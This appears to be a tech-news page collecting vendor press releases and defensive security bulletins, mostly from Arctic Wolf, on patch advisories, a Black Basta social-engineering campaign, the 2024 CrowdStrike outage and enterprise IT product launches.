Arctic Wolf®, a global leader in security operations, has announced the expansion of the Arctic Wolf Aurora^TM Platform with the addition of Arctic Wolf Threat Intelligence, a new module that allows organizations to stay ahead of threats by gaining access to real-time threat intelligence and curated reporting.

With the launch of Arctic Wolf Threat Intelligence, the Arctic Wolf Aurora Platform continues to redefine what having effective security operations means for organizations today. In an environment where cyber risk is synonymous with business risk, companies need a cybersecurity platform that not only keeps pace with threats but actively reduces risk and builds long-term resilience.

The Arctic Wolf Aurora Platform, powered by Alpha AI^TM, makes security work by using advanced AI and machine learning algorithms to deliver scalable and automated threat detection, response, and remediation capabilities. When combined with Arctic Wolf’s Concierge Delivery Model and Security Journey, organizations can achieve critical security outcomes—that drive down cyber risk, empowering them to focus on success and innovation for their business.

“The Arctic Wolf Aurora Platform and Alpha AI stand out in the industry for their unparalleled power and scale, processing over seven trillion events each week to deliver the unique insights on the threat landscape that are exclusive to Arctic Wolf,”.

“Arctic Wolf Threat Intelligence doesn’t just deliver raw data; it transforms vast, complex sets of information into actionable, prioritized insights that are uniquely collected from the more than 6, 200 customers that Arctic Wolf protects each day. By giving organizations access to the same intelligence trusted by Arctic Wolf, we can now empower security teams around the world to better anticipate, adapt, and respond to the rapidly evolving tactics of modern threat actors.”
said Dan Schiappa, chief product and services officer, Arctic Wolf.

With the volume and complexity of cyber threats continuously increasing, organizations are struggling to stay ahead of threat actors who are constantly developing new and novel attack methods. To meet this challenge head on, security teams require more than generic threat feeds—they need prioritized threat intelligence insights that allow them to address the most pressing risks in an efficient and scalable way.

Arctic Wolf Threat Intelligence enables organizations to gain access to the same threat intelligence that powers the Arctic Wolf security operations center (SOC), one of the largest commercial SOCs in the world. Drawing from the Arctic Wolf Aurora Platform’s immense dataset that includes over 500,000 daily malware samples and more than 125,000 monthly SOC investigations that span virtually all threat surfaces, industries, geographies, and organizational sizes, Arctic Wolf Threat Intelligence offers security teams a powerful combination of curated intelligence reporting and real-time threat feeds.

Key feature of Arctic Wolf Threat Intelligence include:

• Threat Pulse: Curated monthly and quarterly insights into active threat campaigns and essential Indicators of Compromise (IoCs) through easy-to-consume written reports and video highlights.
• Intelligence Feeds: IoC lists-including IPs, domains, URLs, and file hashes-designed for seamless integration into firewall and endpoint block/allow lists.
• IOC QuickLinks: Search an organization’s environment for IOCs using Arctic Wolf Data Explorer, simplifying and accelerating threat validation with a single click.

To learn more about the Arctic Wolf Aurora Platform and Arctic Wolf Threat Intelligence, visit arcticwolf.com.

Additional Resources: Visit arcticwolf.com to learn more about our security operations solutions

About Arctic Wolf:
Arctic Wolf® is a global leader in security operations, enabling customers to manage their cyber risk in the face of modern cyber-attacks via a premier cloud-native security operations platform. The Arctic Wolf Security Operations Cloud ingests and analyzes more than seven trillion security events a week to help enable cyber defense at an unprecedented capacity and scale, empowering customers of virtually any size across a wide range of industries to feel confident in their security posture, readiness, and long-term resilience. By delivering automated threat protection, response, and remediation capabilities, Arctic Wolf delivers world-class security operations with the push of a button so customers can defend their greatest assets at the speed of data.

On September 4, 2024, Veeam released a security bulletin announcing that they have fixed several vulnerabilities affecting various Veeam products. Arctic Wolf has highlighted five of these vulnerabilities, which are classified as critical. 

Arctic Wolf has not observed any exploitation of these vulnerabilities in the wild and has not identified any publicly available proof of concept (PoC) exploit code. Veeam Backup & Replication, in particular, has been a frequent target for ransomware groups due to its critical role in backup and recovery. Given this historical targeting, threat actors may try to reverse engineer the patches and develop exploits to take advantage of these vulnerabilities in the near future. 

Recommendation 

Upgrade to Latest Fixed Version

Arctic Wolf strongly recommends that customers upgrade to the latest fixed version. 

Please follow your organization’s patching and testing guidelines to avoid any operational impact. 

References 

• Veeam Security Bulletin

Stay up to date with the latest security incidents and trends from Arctic Wolf Labs. 

Explore the latest global threats with the 2024 Arctic Wolf Labs Threats Report. 

CrowdStrike Update Pushing Windows Machines Into a BSOD Loop.

Crowdstrike, a cybersecurity technology company that provides endpoint security, threat assessment and cyberattack response services, served up a very unfortunate update to Microsoft’s Windows 10 and 11 ecosystem. A recent update to the company´s Falcon sensor is causing major issues for Microsoft Windows users worldwide. This update is leading to blue screen of death (BSOD) loops and making systems inoperable.

The bottom line is that airports, banks, online websites, healthcare and the media (incl. traditional TV), to name a few, are struggling because the update created so much havoc that affected machines ended up with a complete stop in the form of the familiar BSOD / blue screen. Many flights have been grounded, with queues and delays at airports, while shops and communications have also been hit.

Microsoft has said it is taking “mitigation action” to deal with “the lingering impact” of the outage.

The issue, which began on July 19, 2024, affects Windows 10 and 11 systems running CrowdStrike’s endpoint security software. Users report experiencing repeated BSODs with the error message “DRIVER_OVERRAN_STACK_BUFFER,” which prevents normal system boot and operation.

More specifically, it is the Falcon Sensor software that is to blame for all the problems. The program is described by Crowdstrike as “blocking attacks on your systems while capturing and recording activity as it happens to detect threats quickly.”

Just before 12:00 CST+1, their CEO George Kurtz stepped out in a message on X, where he writes that the company is “actively working to find solutions”. He points to an error for Windows users and says that the problems do not affect Mac or Linux.

Statement on Windows Sensor Update

CrowdStrike is actively working with customers impacted by a defect found in a single content update for Windows hosts. Mac and Linux hosts are not impacted. This is not a security incident or cyberattack. 

The issue has been identified, isolated and a fix has been deployed. We refer customers to the support portal for the latest updates and will continue to provide complete and continuous updates on our website. 

We further recommend organizations ensure they’re communicating with CrowdStrike representatives through official channels. 

Our team is fully mobilized to ensure the security and stability of CrowdStrike customers.

The data problems first reported in Australia are related to a security update.
Crowdstrike is reporting that they have fixed the bug with the updates Computer security company Crowdstrike reports that the problem that caused global IT problems on Friday has been identified and isolated, and a fix has been implemented.
The serious IT problems affect many large international companies, including airports, banks and websites worldwide. The problems also affect a number of Norwegian businesses.

The incident is referred to as the biggest IT collapse in history.

How to Check CrowdStrike sensor version is affected by the BSOD issue

1. Identify your sensor version:
   Boot into Safe Mode and check the CrowdStrike Falcon sensor version installed on your system. The problematic update seems to be affecting various sensor versions, including version 6.58.
2. Check the installation date:
   Look at the installation date of the CrowdStrike Falcon sensor. If it coincides with the onset of BSOD issues (around July 19, 2024), it’s likely to be the cause.
3. Look for specific error messages:
   The BSOD error associated with this issue is “DRIVER_OVERRAN_STACK_BUFFER”. If you’re seeing this error, your system is likely affected.

How to fix the Crowdstrike bug (Possible Workarounds)

1. Start Windows in Safe Mode or open the Windows Recovery Environment
2. Navigate to C:\Windows\System32\drivers\CrowdStrike
3. Find the file “C-00000291*.sys” and delete it
4. Restart the machine

And according to those in the know, the fix will probably have to be applied separately to each and every device affected – causing a massive headache for IT departments everywhere around the world.

Since April 2024, Arctic Wolf has been tracking an ongoing campaign by Black Basta ransomware group affiliates leveraging Microsoft´s Windows Quick Assist for initial access. The Black Basta affiliates have been conducting vishing (voice phishing) attacks by impersonating IT or help desk personnel, claiming they need to fix an issue on the victim’s device. In other instances, the threat actors leverage an email bomb attack to flood the victim’s mailbox with emails from subscription services. They then call the victim, impersonating IT support, and offer assistance in resolving the issue. In both scenarios, the threat actors persuade the victim to provide access through Quick Assist by entering a security code and granting permissions to control their device. 

Once given remote access, the threat actors execute scripts with cURL commands to download batch or ZIP files, delivering malicious payloads such as Qakbot, ScreenConnect, NetSupport Manager, and Cobalt Strike. Establishing persistence with these tools, the threat actors proceed with the attack chain, including domain enumeration, lateral movement, and using PsExec to deploy Black Basta ransomware throughout the environment. 

Additional Initial Access Tactic: Microsoft Teams

On June 12, 2024, Microsoft revealed that in late May, Black Basta affiliates were observed using Microsoft Teams to reach target users. The threat actors used Teams to send messages and make calls, pretending to be IT or help desk staff. This tactic results in the misuse of Windows Quick Assist, credential theft through EvilProxy, execution of batch scripts, and deployment of SystemBC for maintaining persistence and controlling compromised systems. Given Microsoft Teams’ widespread adoption in enterprise systems globally, this new attack vector observed in this campaign poses a significant risk to organizations. 

Detections for Campaign TTPs

Arctic Wolf has multiple detections in place that identify many of the Tactics, Techniques, and Procedures (TTPs) currently utilized in this campaign by the threat actors. These include detections for email bombing, remote access software, and tools for ingress. 

Additionally, Arctic Wolf has agent-based detections in place for relevant tooling across several other TTPs including credential access, discovery, and reconnaissance that have been observed to be associated with Black Basta connected activity in the past.  

Customers can expect tickets from the Arctic Wolf SOC for any malicious activity detected surrounding the campaign TTPs.

Recommendations 

Recommendation #1: Uninstall Windows Quick Assist and/or Other RMM Tools if Not Utilized in Your Environment

If your organization does not utilize Windows Quick Assist and/or any other remote support tools, Arctic Wolf strongly recommends disable or uninstall them. This prevents external threat actors from exploiting these tools to gain unauthorized access to your devices. 

• Disabling Windows Quick Assist 
• To disable Windows Quick Assist, block traffic to the https://remoteassistance.support.services.microsoft.comendpoint. This is the primary endpoint used by Quick Assist to establish a session, and once blocked, Quick Assist can’t be used to get help or help someone. 
• Uninstalling Quick Assist 
• Uninstall via powershell – Run the following PowerShell command as Administrator: 
• Get-AppxPackage -Name MicrosoftCorporationII.QuickAssist | Remove-AppxPackage -AllUsers 
• Uninstall via Windows Settings 
• Navigate to Settings > Apps > Installed apps > Quick Assist > select the ellipsis (…), then select Uninstall. 

Additionally, consider implementing policies to block the installation and use of Windows Quick Assist and other RMM tools unless they have been explicitly approved for use within your environment. This approach helps ensure that only vetted and secure tools are in operation, further safeguarding your systems. 

Recommendation #2: Implement Comprehensive Security Awareness Training

Black Basta affiliates have successfully socially engineered victims through calls and emails during this ongoing campaign. Arctic Wolf strongly recommends implementing comprehensive security awareness training campaigns. These initiatives are designed to equip users with the skills needed to quickly identify and report suspicious activities, including observed tech support scams in this campaign. 

Arctic Wolf has several vishing modules within our Managed Security Awareness (MSA) product that will help users identify the suspicious activity outlined in this bulletin. 

Recommendation #3: Microsoft Teams Attack Vector Safeguards

Microsoft has provided the following mitigations to protect against attacks leveraging Microsoft Teams: 

• Educate Microsoft Teams users to check for the ‘External’ tag on communications from external sources, exercise caution in sharing information, and avoid sharing account details or approving sign-in requests via chat. 
• Apply Microsoft’s security best practices for Microsoft Teams. 

Learn more here

Arctic Wolf, a global leader in security operations, has announced the addition of identity threat detection and response (ITDR) enhancements to Arctic Wolf Managed Detection and Response ( MDR ), enabling businesses to further fortify their environments against evolving threats with new active response capabilities and integrations for Microsoft Defender for Identity and Okta.

As threat actors continue to target identity infrastructure with account compromise tactics such as credential stuffing, the ability to swiftly contain and mitigate identity risks at scale is critical in defending crucial data assets and protecting users. In 2023, 39% of incidents investigated by Arctic Wolf Incident Response were initiated via external remote access using compromised, legitimate credentials, underscoring the importance of ITDR capabilities as a core function of security operations, as opposed to a standalone XDR, SIEM, or SOAR solution. “Identity threat detection and response (ITDR) is emerging as a security operations center (SOC) function focus while IAM teams grapple with new tools to address enhancing detection of identity misuse,” according to Gartner® Research.¹

The Arctic Wolf Platform updates include:

• Active Response for Identity: New capabilities enable immediate action against threats in identity infrastructure, leveraging response actions to quickly disable impacted user accounts, revoking access to potentially sensitive information or systems and reducing risk for organizations.
• Microsoft Defender for Identity Integration: New integration with Microsoft Defender for Identity to protect user identities and reduce attack surfaces, increasing visibility into identity infrastructure for earlier detection of identity-based attacks, including Business Email Compromise (BEC).
• Okta Impossible Travel Detection: Expanded detection capabilities for the existing Okta integration that will enhance cross-attack surface coverage with detection of compromised accounts using indicators of compromise (IOC) based on velocity alerts from Okta.

“As adversaries increase the use of identity-based attacks, the ability to integrate robust ITDR capabilities into security operations is critical in building business resilience, as containment and mitigation extends beyond the endpoint alone,” said Dan Schiappa, chief product and service officer, Arctic Wolf. “Effective cybersecurity hinges on detecting and remediating threats as quickly as possible. These new capabilities allow us to narrow the detection gap and minimize impact, effectively extinguishing and restricting adversarial account access more completely. As we continue to innovate on our world-class security operations platform, we are excited to continue to deliver on the security outcomes and resilience that have long been promised, yet underdelivered, by the security market at large.”

Through its cloud-native, AI-driven platform, Arctic Wolf empowers organizations of almost any size to achieve security operations at the push of a button. Through hundreds of security and technology integrations available to customers today, the Arctic Wolf Security Operations Cloud ingests, parses, enriches, and analyzes more than 5.5 trillion security events per week from a global base of over 5,700 customers.

We believe that by being named the fastest growing vendor by revenue in 2023 according to Gartner® Market Share: Security Services, Worldwide, 2023 Research², Arctic Wolf continues to entrench itself not only as a leading cybersecurity platform, but also as a transformative technology company. In the last 12 months, Arctic Wolf has been named to the CNBC Disruptor 50 for a third consecutive year, the Forbes Cloud 100 for a second consecutive year, and to the inaugural edition of the Fortune Cyber 60. Additionally, the company was named a Leader in the 2024 IDC MarketScape for Worldwide Managed Detection and Response Services. We were also  recognized by our customers as a Customers’ Choice  for the North America region in the July 2023 Gartner Peer Insights Voice of the Customer for Managed Detection and Response Services, and received the highest overall rating  and the highest Willingness to Recommend scores in the January 2024 Gartner Peer Insights Voice of the Customer for Vulnerability Assessment.

Nutanix and NVIDIA Collaborate to Accelerate Enterprise AI Adoption

Nutanix has announced a collaboration with NVIDIA aimed at helping enterprises more easily adopt generative AI (GenAI). Through the integration of NVIDIA NIM inference microservices with Nutanix GPT-in-a-Box 2.0, customers will be able to build scalable, secure, high-performance GenAI applications across the enterprise and at the edge.

Today, most AI innovation is centered on the public cloud due to access to infrastructure and tooling able to support the needs of AI applications. Additionally, only the largest enterprises with teams of data scientists have made progress in GenAI adoption. However, most enterprises are looking to invest in supporting their AI strategy, including boosting their investment at the edge, according to the State of Enterprise AL. What’s missing is a fast-track for organizations to mainstream GenAI beyond the public cloud, across the enterprise, and at the edge.

Nutanix’s integration of NVIDIA NIM microservices will enable its customers to leverage Nutanix GPT-in-a-Box 2.0, built on top of the company’s rich data services and compute platform, and use it to simplify AI model deployment and more effectively and efficiently run enterprise AI/ML applications. This will expand access to the growing catalog of NVIDIA NIM microservices from across the enterprise and at the edge, helping to fast-track GenAI initiatives without requiring a team of data scientists.

Nutanix’s collaboration with NVIDIA helps simplify the experience, which many enterprises find challenging today, of making all the decisions required to stand up AI solutions. These include choosing among hundreds of thousands of models, serving engines, and supporting infrastructure, while lacking the new skill sets needed to deliver GenAI solutions to their customers.

Nutanix GPT-in-a-Box simplifies building an AI-ready stack, integrated with Nutanix Objects and Nutanix Files for model and data storage, enabling customers to maintain control over their data. New features delivered in GPT-in-a-Box 2.0 will also automate deploying and running inference endpoints for a wide range of AI models and secure access to the model using fine-grained access control and auditing.

Running on top of the Nutanix Cloud Platform, NIM microservices will enable seamless AI inferencing on a wide range of models, including open-source community models, NVIDIA AI Foundation models, and custom models, leveraging industry-standard application programming interfaces. To support the integration, Nutanix also announced certification for the NVIDIA AI Enterprise 5.0 software platform for streamlining the development and deployment of production-grade AI, including NVIDIA NIM. 

“Enterprises are looking to simplify GenAI adoption, and Nutanix enables customers to move to production more easily while maintaining control, privacy, and cost,” said Tarkan Maner, Chief Commercial Officer at Nutanix. “This collaboration will add to this value by making it even easier for customers to leverage NVIDIA’s latest innovation with NIM.”

“Across every industry, enterprises are working to efficiently integrate AI into the cloud and data platforms that power their operations,” said Manuvir Das, Vice President of Enterprise Computing at NVIDIA. “The integration of NVIDIA NIM into Nutanix GPT-in-a-Box gives enterprises an AI-ready solution for rapidly deploying optimized models in production.”

Nutanix GPT-in-a-Box 2.0 is expected to be available in the second half of 2024. More information can be found here.

Arctic Wolf®, a global leader in security operations, has announced it is positioned as a Leader in the IDC MarketScape: Worldwide Managed Detection and Response Services 2024 Vendor Assessment (Doc #US49006922). We believe the IDC MarketScape recognition validates how the company’s single, open platform delivers effective, comprehensive, and reliable security outcomes for customers around the globe.

Arctic Wolf Managed Detection and Response (MDR) provides exceptional visibility and threat protection to thousands of customers worldwide via the Arctic Wolf Platform, which ingests, parses, enriches, and analyzes more than five trillion security events per week. With its open-XDR architecture and a common data model built on the Open Cybersecurity Schema Framework (OCSF), the Arctic Wolf Platform leverages advanced AI-algorithms to deliver game-changing noise reduction that turns thousands of daily alerts into an average of a single actionable ticket for customers each day.

The assessment evaluated 19 Managed Detection and Response (MDR) vendors with a minimum of $60 million in annual revenue using a rigorous scoring methodology that examined product and service offerings, capabilities and strategies, and each vendor’s current and future market success factors.

According to the IDC MarketScape, “Taking a vendor and technology-neutral approach, Arctic Wolf’s customers have the flexibility to swap out tools and technologies (and therefore vendors), as well, preventing vendor lock-in without sacrificing their security efficacy.” Additionally, the IDC MarketScape highlights how “Arctic Wolf recognizes that their customers struggle with the evolving security demands of their organizations and the growth of their vulnerable attack surfaces” and that the company “designs a custom security journey for every customer to streamline the process of proactively mitigating risk and minimizing attack surface exposure.”

“We believe our position as a worldwide MDR Leader in the IDC MarketScape is a reflection of the power of the unified platform we’ve built, and our proven ability to deliver the security outcomes our customers desire.” said Dan Schiappa, chief product officer, Arctic Wolf. “In a threat landscape where threat actors are able to use AI to launch sophisticated attacks at an incredible scale, Arctic Wolf Managed Detection and Response is the ideal solution for organizations looking for holistic protection that defends at the speed of data.”

Being named a Leader in the IDC MarketScape for Worldwide Managed Detection and Response Services is the latest piece of market validation for Arctic Wolf’s security operations vision, and its leadership placement in this global assessment reflects the significant international investments the company has made in recent years, the most recent highlights of which include:

• Expanding the availability of its industry-innovating $1 Million Security Operations Warranty to customers in Europe and the ANZ region
• Launching Arctic Wolf Incident Response and the award-winning Arctic Wolf Incident Response JumpStart Retainer in EMEA and ANZ
• Scaling to five global security operations centers (SOCs) and six international data centers to provide customers with optionality in how their data is stored and accessed

In the last twelve months, Arctic Wolf has also been recognized as part of the CNBC Disruptor 50, the Forbes Cloud 100, the Fortune Cyber 60, and received a Customers’ Choice distinction in the Managed Detection Response market from Gartner® Peer Insights.

To download an excerpt of the IDC MarketScape: Worldwide Managed Detection and Response Services 2024 Vendor Assessment, visit arcticwolf.com.

Additional Resources:

• Join the conversation with Arctic Wolf on Facebook, Twitter, LinkedIn, and YouTube
• Visit arcticwolf.com to learn more about our security operations solutions
• If you’re ready to get started, request a demo, get a quote, or conduct a Security Operations Maturity Assessment
• Want to join Arctic Wolf’s Partner Program? Apply today

About Arctic Wolf:
Arctic Wolf® is a global leader in security operations, enabling customers to manage their cyber risk in the face of modern cyber-attacks via a premier cloud-native security operations platform. The Arctic Wolf Security Operations Cloud ingests and analyzes more than five trillion security events a week to help enable cyber defense at an unprecedented capacity and scale, empowering customers of virtually any size across a wide range of industries to feel confident in their security posture, readiness, and long-term resilience. By delivering automated threat protection, response, and remediation capabilities, Arctic Wolf delivers world-class security operations with the push of a button so customers can defend their greatest assets at the speed of data.

About IDC MarketScape:

IDC MarketScape vendor assessment model is designed to provide an overview of the competitive fitness of ICT (information and communications technology) suppliers in a given market. The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. IDC MarketScape provides a clear framework in which the product and service offerings, capabilities and strategies, and current and future market success factors of IT and telecommunications vendors can be meaningfully compared. The framework also provides technology buyers with a 360-degree assessment of the strengths and weaknesses of current and prospective vendors.

Arctic Wolf, a global leader in security operations, has announced the release of the Arctic Wolf Cyber Resilience Assessment, an innovative risk assessment tool designed to help businesses of almost any size advance their cyber resilience and improve insurability by effectively mapping their security posture against industry-standard frameworks.

The release of Arctic Wolf Cyber Resilience Assessment expands Arctic Wolf’s Security Journey – a bespoke customer program that brings together tools and assessments to help customers better assess, mitigate, and transfer risk.

Organizations understand that cyber resilience is a critical factor in overall business resilience, specifically in obtaining cyber insurance. As the threat landscape continues to expand, nearly half of organizations need a risk assessment in order to qualify for cyber insurance, according to IDC¹. Standardized risk measurement against standard cybersecurity frameworks, including those from the National Institute of Standards and Technology (NIST) and Center for Internet Security (CIS), is lacking industry-wide. As a result, cyber risk quantification is a critical challenge for leaders looking to provide an objective overview of cyber risk to cyber insurance carriers and other non-technical stakeholders.

In the recently published NIST Cybersecurity Framework 2.0, a new GOVERN function was added, underscoring the importance for organizations to establish and monitor their cybersecurity risk management strategy, expectations and policies. Arctic Wolf Cyber Resilience Assessment helps organizations understand how ongoing governance activities rank relative to other cyber risks, track security posture over time and share assessment findings with non-technical stakeholders, including cyber insurance carriers through the Arctic Wolf Insurability Rating output. By mapping security posture to an agnostic industry standard with a transparent scoring system, organizations will be able to more effectively evaluate security hygiene and better understand how cyber risk impacts insurability with a transparent view of gaps and areas of improvement.

“Transferring certain business risks to a cyber insurance policy is a necessary piece of the fight to end cyber risk,” said Scott Holewinski, senior vice president, Security Journey, Arctic Wolf. “Whether companies are just starting down the path to obtain a cyber insurance policy, or are facing their annual insurance renewal, effectively assessing and communicating their security posture to the cyber insurance ecosystem is critical. With this announcement, Arctic Wolf continues to extend its position as a global cybersecurity leader delivering innovative new solutions that bring us closer to our insurance industry partners and open the possibility for exciting new risk transfer options for our customers.”

“In this challenging threat landscape, insurability has become a board-level concern for clients,” said Jacob Ingerslev, senior vice president, Underwriting, Cyber & Tech, at Tokio Marine HCC – Cyber & Professional Lines Group, a member of the Tokio Marine HCC group of companies based in Houston, Texas. “The market is flooded with proprietary risk assessment tools, many of which are tedious and require manual tracking, lack standardization and do not always map to established frameworks such as NIST. Being able to provide businesses with transparent security posture assessments will help technical leaders communicate areas of investment to board-level stakeholders and ultimately help businesses work towards becoming more insurable.”

“Cyber risk is business risk,” said Kristi Yauch, vice president, Information Security, Winnebago Industries Inc. “In order to withstand the pressures of today’s rapidly evolving threat landscape and increasing regulatory demands, it’s critical that organizations can directly map security posture to industry-standard frameworks and assure insurability; this assessment gives leaders the knowledge and insight to effectively navigate their security journey in the most impactful ways.”

Arctic Wolf Cyber Resilience Assessment is available to all Arctic Wolf customers, through the Unified Portal, building upon the company’s ongoing commitment to help organizations advance business resilience and insurability through an innovative approach to security operations.

Key features of Cyber Resilience Assessment include:

• Industry Standard Framework Mapping: Options for customers to easily map security posture against their preferred industry-standard frameworks include NIST CSF 1.1, 2.0 and CIS Critical Security Controls v8, which present an agnostic, transparent rating system that is not reliant on proprietary risk assessment tools.
• Arctic Wolf Insurability Rating: Cyber Resilience Assessment includes an integrated cyber insurance rating to improve insurability. Customers can leverage this in insurance renewal cycles and in conversations with brokers to offer artifacts of support for self-attestations.
• Dynamic Risk Ranking and Prioritization: Aligned with the individual security items of each industry-standard framework, areas of risk are outlined and prioritized for mitigation, enabling more effective budget and resource allocation discussions for leaders.

Liquidware, a leader in Digital Employee Experience ( DEX ) solutions for digital workspaces, today announced the release of Stratusphere UX 6.7.

This latest version delivers a range of new features designed to improve the overall employee experience and empower IT professionals with deeper insights into workplace productivity.

Redesigned UI
Stratusphere UX 6.7 boasts a redesigned User Interface (UI) that prioritizes user experience. The streamlined interface offers improved clarity and ease of navigation, allowing employees to access the tools and resources they need more efficiently.

DEX User Sentiment Surveys
Understanding employee sentiment is crucial for optimizing the digital workspace. Stratusphere UX 6.7 introduces DEX User Sentiment Surveys, a new feature that enables IT teams to gather valuable feedback directly from employees. By incorporating user feedback into decision-making processes, organizations can ensure that their DEX strategy aligns with the needs and preferences of their workforce.

Logoff Breakdown
Stratusphere UX 6.7 also provides IT professionals with granular insights into logoff breakdowns. We collect all the processes, events, status, errors, and group policies that allow a deep view of any potential bottlenecks at logoff. This level of insight is invaluable for troubleshooting and issue resolution.

CommandCTRL Integration
For organizations leveraging Liquidware’s real-time remediation solution, CommandCTRL, Stratusphere UX 6.7 now offers seamless integration. This integration empowers IT admins to access real-time metrics and a suite of remediation tools for quicker resolution of incidents, reducing downtime and ensuring users are more productive.

“We are incredibly proud of this release, which enhances our DEX offering and keeps us at the forefront of DEX solutions,” said Jason Mattox, CTO of Liquidware. “This release of Stratusphere UX is designed to address key challenges faced by enterprises globally, empowering organizations to deliver a superior digital experience for their employees.”

As a leading provider of DEX solutions that empower organizations to deliver a frustration-free digital work experience for their employees, Liquidware offers a comprehensive suite of solutions  — including Stratusphere UX — that enable IT professionals to monitor, troubleshoot, and optimize the digital workspace, ensuring that employees have the resources they need to be productive and successful.

On April 9, 2024, Microsoft published their April 2024 security updates with patches for 150 vulnerabilities. Among these vulnerabilities, Arctic Wolf has highlighted five vulnerabilities in this bulletin, which have either been exploited in the wild or labeled as critical severity by Microsoft. 

Notably, of the 150 patched vulnerabilities, 67 were remote code execution vulnerabilities. However, due to various prerequisites for exploitation, the vulnerability severities did not rise to critical severity. 

Impacted Product #1: Windows

Impacted Product #2: Microsoft Defender for IoT

Arctic Wolf will follow its standard internal processes to assess the impact of the newly reported vulnerabilities within its own environment and if impacted, will address them within the established remediation timelines in our Security Patching Policy.  

Recommendations for CVE-2024-26234 for Windows and CVE-2024-29053

Recommendation: Apply Security Updates to Impacted Products

CVE-2023-24932 was previously patched in a separate Patch Tuesday (May 2023). However, Microsoft added Windows 11 version 23H2 to the updated products list. Arctic Wolf has elected not to add the May 2023 reference article and update links to this table to ensure clarity around patching the most recent vulnerabilities reported by Microsoft. 

Additional steps are required to mitigate CVE-2023-24932. 

• Microsoft added Windows 11 version 23H2 for x64-based systems and Windows 11 version 23H2 for ARM-based systems to the update table because the April 2024 security updates provide the latest mitigations. These mitigations are off by default. Customers who should take additional steps to implement security mitigations for a publicly disclosed Secure Boot bypass leveraged by the BlackLotus UEFI bootkit and who would like to take a proactive security stance or to begin preparing for the rollout, please refer to KB5025885. 

On March 21, 2024, security researchers published a technical analysis along with a proof of concept (PoC) regarding the critical Remote Code Execution (RCE) vulnerability, CVE-2023-48788, in Fortinet’s FortiClientEMS. This vulnerability enables an unauthenticated threat actor to achieve RCE through the manipulation of SQL commands. 

Fortinet has stated that this vulnerability is under active exploitation. PoC exploit code is also now publicly available. While threat actors have not previously targeted FortiClientEMS, several other Fortinet products have been historically targeted such as FortiOS through CVE-2024-21762 and CVE-2024-23113 back in February 2024. 

Recommendation for CVE-2023-48788

Upgrade Fortinet FortiClientEMS to Fixed Version

Arctic Wolf strongly recommends upgrading Fortinet FortiClientEMS to the latest version.  

Please follow your organization’s patching and testing guidelines to avoid operational impact. 

More info here

Liquidware, a recognized authority in Digital Employee Experience ( DEX ) solutions for digital workspaces, proudly announces a year of exceptional growth and continued innovation. The company celebrates a 74% increase in Annual Recurring Revenue (ARR) and an 80% growth in enterprise adoption of its FlexApp technology. 

Liquidware offers the most comprehensive DEX coverage compared to other vendors. The company’s innovative solutions manage DEX using ProfileUnity, deliver it through FlexApp’s dynamic applications, monitor it with Stratusphere UX, and control it using CommandCTRL. 

Gartner forecasts that the DEX tool market will reach $476.8 million by the end of 2023 and grow at a compound annual rate of 17.3% through 2027, based on constant currency.1 

“As we reflect on the strides made in 2023, it’s evident that this was a year of remarkable growth and significant achievements for Liquidware in key areas of EUC (End User Computing),” said Chris Akerberg, President and COO of Liquidware. 

2023 was marked by several key achievements for Liquidware: 

• Launch of ‘CommandCTRL’: Liquidware introduced this cutting-edge SaaS product, enhancing its DEX solutions with real-time remediation and integrated AI. Featuring a 7-day DVR playback for DEX analysis, CommandCTRL garnered attention and accolades, winning the VMware Explore Finalist award and being recognized as a Redmond Magazine Product of the Year. 
• Launch and Expansion of the ‘Liquidware Ready’ Program: Enhancing the confidence of partners and customers in choosing digital employee experience solutions compatible with Liquidware’s technologies. Microsoft, Citrix, VMware, and Dizzion FRAME were designated strategic platform partners while Application Readiness, IGEL, Nerdio, Stratodesk, Rimo3, and 10ZiG were awarded Liquidware Ready Verified status.  
• Advancements in FlexApp One: The release of ProfileUnity with FlexApp version 6.8.6, brought about significant offline capabilities with FlexApp One, OAuth support, and performance enhancements, enhancing application portability and deployment across diverse Windows workspaces. 
• Strategic Growth through Partnerships: Broadening the impact and reach of Liquidware’s FlexApp One technology in the digital workspace management sector, several third parties announced or neared integration. Broad and growing Stratusphere UX support for ServiceNow and thin clients continued to assert Stratusphere UX as a leader in DEX monitoring and optimization.  

Andy Whiteside, President and CEO of XenTegra, a Liquidware partner, commented saying, “In a dynamic market shaped by significant shifts, Liquidware shines. Their solutions cover the four critical phases of Digital Employee Experience, making them adaptable to customer needs during times of transformation. Liquidware continues to empower enterprises to excel in today’s dynamic digital workspaces, and we’re excited about the journey ahead. Their success and mission continue to align with XenTegra’s commitment to empowering enterprises in the digital workspace.” 

Akerberg continued, “In a landscape where many focus on singular aspects of DEX, Liquidware stands apart. We offer a holistic approach, delivering comprehensive solutions that encompass all critical components of DEX — from delivery and management to monitoring and control. Our commitment to these four pillars empowers modern enterprises to thrive in today’s dynamic digital workspace environments.” 

For more information about Liquidware and its range of solutions, please visit Liquidware’s website.

On January 16, 2024, Citrix published a security bulletin disclosing two zero-day vulnerabilities (CVE-2023-6548 & CVE-2023-6549) being actively exploited in Citrix NetScaler ADC and NetScaler Gateway.

Specifics of the exploitation observed by Citrix have not been revealed and Arctic Wolf has not identified any public Proof of Concept (PoC) exploits. However, we assess more threat actors are likely to target these vulnerabilities in the near-term due to the potential level of access they can obtain once compromising an appliance. Threat actors have also previously exploited several vulnerabilities targeting Citrix NetScaler ADC and NetScaler Gateway. Most notably in late 2023, nation-state and ransomware threat actors exploited the information disclosure vulnerability CVE-2023-4966 (Citrix Bleed) against several high profile organizations.

Although there is currently no evidence linking these vulnerabilities directly to Citrix Bleed, Arctic Wolf will continue to closely monitor the situation for any emerging threats or developments.

This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.

Recommendation

Upgrade Citrix NetScaler ADC and NetScaler Gateway to Fixed Version

Arctic Wolf strongly recommends upgrading Citrix NetScaler ADC and NetScaler Gateway their respective fixed versions.

Note: Citrix NetScaler ADC and NetScaler Gateway version 12.1 has reached its End of Life (EOL). We strongly advise customers to proceed with upgrading their appliances to a supported version that addresses the existing vulnerabilities.

Please follow your organization’s patching and testing guidelines to avoid operational impact.

References

1. Citrix Article
2. CISA Adds Vulnerabilities to KEV
3. Arctic Wolf Blog (CVE-2023-4966)

Source